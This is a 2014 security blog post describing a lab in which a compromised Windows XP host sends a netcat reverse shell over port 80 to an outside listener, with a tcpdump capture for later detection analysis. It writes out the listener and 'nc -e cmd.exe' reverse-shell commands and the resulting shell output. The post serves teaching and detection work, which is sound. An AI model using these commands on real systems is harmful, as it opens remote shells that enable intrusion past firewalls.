Monday, September 1, 2014

Setup and detect netcat reverse shell

In most cases (if not all), a firewall is typically placed between the Internet and the internal network. While a firewall helps in keeping out the bad guys, what happens when the bad guys are already in, is another issue.

In this post, we will assume, the bad guy has already gained access to a system on the internal network. In addition, since we know most firewalls have port 80 open, we will send a (reverse) shell outside of the firewall to our bad guy. If we have an IPS in place this should detect this type of traffic. However, if not our firewall will more than likely allow this traffic through.

Our topology for this lab will be as follows:
Windows XP host - internal network
Bad guy - Internet -

While performing this lab, we will also capture the traffic using
root@securitynik:~# tcpdump -nnvvi eth0 port 80 -w netcat.pcap

NetCat Listener on bad guy: 
root@securitynik:~# nc -nnvl -p 80 -4
nc: listening on 80 ...

Now that we have our netcat listener and we already have access to the computer on the internal LAN, let's send the shell outside of the firewall. 

C:\nc>nc -nnvv 80 -e c:\windows\system32\cmd.exe
(UNKNOWN) [] 80 (?) open

As can be seen the connection was opened successfully. If we look at the console of the bad guy's computer we see the following

root@securitynik:~# nc -nnvl -p 80 -4

nc: listening on 80 ...
nc: connect to 80 from 1059
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.


From the above, we see we now have full shell access to the system. To confirm what we've done, let's use the next post to analyze our traffic.



  1. Replies
    1. :-) It's right here.

      You did not ask for part 3 but here it is:

      thanks for visiting.